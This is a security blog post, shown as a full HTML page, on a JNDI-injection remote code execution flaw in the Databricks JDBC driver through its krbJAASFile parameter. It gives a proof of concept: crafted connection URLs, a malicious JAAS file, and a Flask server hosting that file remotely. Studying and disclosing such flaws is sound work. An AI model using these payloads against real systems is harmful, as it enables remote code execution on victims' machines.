<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Background StoryYesterday, I received a threat intelligence alert regarding the Databricks JDBC driver. After a quick review, I pinpointed the root cause of the issue. The vulnerability stems from imp">
<meta property="og:type" content="article">
<meta property="og:title" content="Databricks JDBC Attack via JAAS">
<meta property="og:url" content="https://pyn3rd.github.io/2024/12/13/Databricks-JDBC-Attack-via-JAAS/index.html">
<meta property="og:site_name">
<meta property="og:description" content="Background StoryYesterday, I received a threat intelligence alert regarding the Databricks JDBC driver. After a quick review, I pinpointed the root cause of the issue. The vulnerability stems from imp">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://pyn3rd.github.io/images/pasted-330.png">
<meta property="og:image" content="https://pyn3rd.github.io/images/pasted-331.png">
<meta property="article:published_time" content="2024-12-13T12:09:19.000Z">
<meta property="article:modified_time" content="2024-12-13T12:50:13.677Z">
<meta property="article:author" content="pyn3rd">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://pyn3rd.github.io/images/pasted-330.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Databricks JDBC Attack via JAAS</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
 <link rel="alternate" href="/atom.xml" title="" type="application/atom+xml" />
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 5.4.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/archives/">Archives</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/11/22/How-to-use-MSSQL-CLR-assembly-to-bypass-EDR/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://pyn3rd.github.io/2024/12/13/Databricks-JDBC-Attack-via-JAAS/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://pyn3rd.github.io/2024/12/13/Databricks-JDBC-Attack-via-JAAS/&text=Databricks JDBC Attack via JAAS"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://pyn3rd.github.io/2024/12/13/Databricks-JDBC-Attack-via-JAAS/&title=Databricks JDBC Attack via JAAS"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://pyn3rd.github.io/2024/12/13/Databricks-JDBC-Attack-via-JAAS/&is_video=false&description=Databricks JDBC Attack via JAAS"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Databricks JDBC Attack via JAAS&body=Check out this article: https://pyn3rd.github.io/2024/12/13/Databricks-JDBC-Attack-via-JAAS/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://pyn3rd.github.io/2024/12/13/Databricks-JDBC-Attack-via-JAAS/&title=Databricks JDBC Attack via JAAS"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://pyn3rd.github.io/2024/12/13/Databricks-JDBC-Attack-via-JAAS/&title=Databricks JDBC Attack via JAAS"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://pyn3rd.github.io/2024/12/13/Databricks-JDBC-Attack-via-JAAS/&title=Databricks JDBC Attack via JAAS"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://pyn3rd.github.io/2024/12/13/Databricks-JDBC-Attack-via-JAAS/&title=Databricks JDBC Attack via JAAS"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://pyn3rd.github.io/2024/12/13/Databricks-JDBC-Attack-via-JAAS/&name=Databricks JDBC Attack via JAAS&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://pyn3rd.github.io/2024/12/13/Databricks-JDBC-Attack-via-JAAS/&t=Databricks JDBC Attack via JAAS"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#Background-Story"><span class="toc-number">1.</span> <span class="toc-text">Background Story</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Constructing-a-PoC"><span class="toc-number">2.</span> <span class="toc-text">Constructing a PoC</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Databricks JDBC Attack via JAAS
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">pyn3rd</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-12-13T12:09:19.000Z" itemprop="datePublished">2024-12-13</time>
        
        (Updated: <time datetime="2024-12-13T12:50:13.677Z" itemprop="dateModified">2024-12-13</time>)
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h3 id="Background-Story"><a href="#Background-Story" class="headerlink" title="Background Story"></a>Background Story</h3><p>Yesterday, I received a threat intelligence alert regarding the Databricks JDBC driver. After a quick review, I pinpointed the root cause of the issue.</p>
<p>The vulnerability stems from improper handling of the krbJAASFile parameter. An attacker could potentially exploit this flaw to achieve remote code execution (RCE) within the driver’s context by tricking the victim into using a specially crafted connection URL that includes the krbJAASFile property. It’s important to note that the affected product versions are 2.6.38 and earlier.</p>
<h3 id="Constructing-a-PoC"><a href="#Constructing-a-PoC" class="headerlink" title="Constructing a PoC"></a>Constructing a PoC</h3><p>Creating a proof of concept (PoC) is crucial for reproducing vulnerabilities effectively. It can often save significant time during the testing process. Having researched JDBC assemblies for several years, I understand how vital it is to develop a clear and reliable PoC.</p>
<p>Here is the vulnerable connection URL:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">jdbc:databricks://127.0.0.1:443;AuthMech=1;KrbAuthType=1;httpPath=/;KrbHostFQDN=test;KrbServiceName=test;krbJAASFile=/tmp/jaas.conf&quot;;</span><br></pre></td></tr></table></figure>

<p>The JAAS configuration file is as follows:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Client &#123;</span><br><span class="line">com.sun.security.auth.module.JndiLoginModule required</span><br><span class="line">    user.provider.url=&quot;ldap://127.0.0.1:1389/wr4euw&quot;</span><br><span class="line">    group.provider.url=&quot;test&quot;</span><br><span class="line">    useFirstPass=true</span><br><span class="line">    serviceName=&quot;test&quot;</span><br><span class="line">    debug=true;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>


<p><img src="/images/pasted-330.png" alt="upload successful"></p>
<p>Clearly, this is not the desired outcome. Since we cannot compromise a server and modify its configuration or JAAS file, I’ve developed a web server to serve the content of the configuration file—essentially a malicious JNDI remote codebase.</p>
<p>I’ve arranged the web server code using Flask as follows:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">from flask import Flask, jsonify, request</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line">@app.route(&#x27;/jaas.conf&#x27;, methods=[&#x27;POST&#x27;,&#x27;GET&#x27;])</span><br><span class="line">def SSOJSON():</span><br><span class="line">    if request.method == &#x27;GET&#x27;:</span><br><span class="line">        # Path to your jaas.conf file</span><br><span class="line">        jaas_conf_path = &#x27;/root/ssl/jaas.conf&#x27;</span><br><span class="line">        try:</span><br><span class="line">            # Read the contents of the jaas.conf file</span><br><span class="line">            with open(jaas_conf_path, &#x27;r&#x27;) as file:</span><br><span class="line">                jaas_content = file.read()</span><br><span class="line"></span><br><span class="line">            # Construct the response</span><br><span class="line">            response_data = &#123;</span><br><span class="line">                &quot;success&quot;: &quot;true&quot;,</span><br><span class="line">                &quot;jaas_conf&quot;: jaas_content</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            return jaas_content</span><br><span class="line">        except Exception as e:</span><br><span class="line">            # Handle exceptions (file not found, etc.)</span><br><span class="line">            return false;</span><br><span class="line"></span><br><span class="line">if __name__ == &#x27;__main__&#x27;:</span><br><span class="line">     app.run(&#x27;0.0.0.0&#x27;, debug=True, port=443, ssl_context=(&#x27;/root/ssl/jdbc.pyn3rd.com.pem&#x27;, &#x27;/root/ssl/jdbc.pyn3rd.com.key&#x27;))</span><br></pre></td></tr></table></figure>

<p>My approach is sound: the remote web server receives a request, and the malicious configuration file is loaded seamlessly. The remote code execution is then triggered via JNDI injection.</p>
<p>Here’s the crafted connection URL used to exploit the vulnerability:</p>
<p><img src="/images/pasted-331.png" alt="upload successful"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">jdbc:databricks://127.0.0.1:443;AuthMech=1;principal=test;KrbAuthType=1;httpPath=/;KrbHostFQDN=test;KrbServiceName=test;krbJAASFile=https://jdbc.pyn3rd.com:443/jaas.conf</span><br></pre></td></tr></table></figure>

<p>If you have any questions, leave a comment below.</p>

  </div>
</article>


    <div class="blog-post-comments">
        <div id="utterances_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>


        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Archives</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/about/">About</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#Background-Story"><span class="toc-number">1.</span> <span class="toc-text">Background Story</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Constructing-a-PoC"><span class="toc-number">2.</span> <span class="toc-text">Constructing a PoC</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://pyn3rd.github.io/2024/12/13/Databricks-JDBC-Attack-via-JAAS/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://pyn3rd.github.io/2024/12/13/Databricks-JDBC-Attack-via-JAAS/&text=Databricks JDBC Attack via JAAS"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://pyn3rd.github.io/2024/12/13/Databricks-JDBC-Attack-via-JAAS/&title=Databricks JDBC Attack via JAAS"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://pyn3rd.github.io/2024/12/13/Databricks-JDBC-Attack-via-JAAS/&is_video=false&description=Databricks JDBC Attack via JAAS"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Databricks JDBC Attack via JAAS&body=Check out this article: https://pyn3rd.github.io/2024/12/13/Databricks-JDBC-Attack-via-JAAS/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://pyn3rd.github.io/2024/12/13/Databricks-JDBC-Attack-via-JAAS/&title=Databricks JDBC Attack via JAAS"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://pyn3rd.github.io/2024/12/13/Databricks-JDBC-Attack-via-JAAS/&title=Databricks JDBC Attack via JAAS"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://pyn3rd.github.io/2024/12/13/Databricks-JDBC-Attack-via-JAAS/&title=Databricks JDBC Attack via JAAS"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://pyn3rd.github.io/2024/12/13/Databricks-JDBC-Attack-via-JAAS/&title=Databricks JDBC Attack via JAAS"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://pyn3rd.github.io/2024/12/13/Databricks-JDBC-Attack-via-JAAS/&name=Databricks JDBC Attack via JAAS&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://pyn3rd.github.io/2024/12/13/Databricks-JDBC-Attack-via-JAAS/&t=Databricks JDBC Attack via JAAS"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
      <div class="footer-left">
        Copyright &copy;
        
        
        2016-2024
        pyn3rd
      </div>
      <div class="footer-right">
        <nav>
          <ul>
            <!--
          --><li><a href="/">Home</a></li><!--
        --><!--
          --><li><a href="/archives/">Archives</a></li><!--
        --><!--
          --><li><a href="/search/">Search</a></li><!--
        --><!--
          --><li><a href="/about/">About</a></li><!--
        -->
          </ul>
          <ul>
            
              <span id="busuanzi_container_site_pv">
                  Views <span id="busuanzi_value_site_pv"></span>
              </span>
              <span class="post-meta-divider">|</span>
              <span id="busuanzi_container_site_uv" style='display:none'>
                  Visitors <span id="busuanzi_value_site_uv"></span>
              </span>
            <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            
          </ul>
        </nav>
      </div>
      
</footer>



    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

  <script type="text/javascript">
        var _hmt = _hmt || [];
        (function() {
          var hm = document.createElement("script");
          hm.src = "https://hm.baidu.com/hm.js?e6d8a6d6d91254d9108e469862e88709";
          var s = document.getElementsByTagName("script")[0];
          s.parentNode.insertBefore(hm, s);
        })();
        </script>

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

    <script type="text/javascript">
      var utterances_repo = 'pyn3rd/pyn3rd.github.io';
      var utterances_issue_term = 'pathname';
      var utterances_label = 'Comment';
      var utterances_theme = 'github-dark';

      (function(){
          var script = document.createElement('script');

          script.src = 'https://utteranc.es/client.js';
          script.setAttribute('repo', utterances_repo);
          script.setAttribute('issue-term', 'pathname');
          script.setAttribute('label', utterances_label);
          script.setAttribute('theme', utterances_theme);
          script.setAttribute('crossorigin', 'anonymous');
          script.async = true;
          (document.getElementById('utterances_thread')).appendChild(script);
      }());
  </script>

</body>
</html>
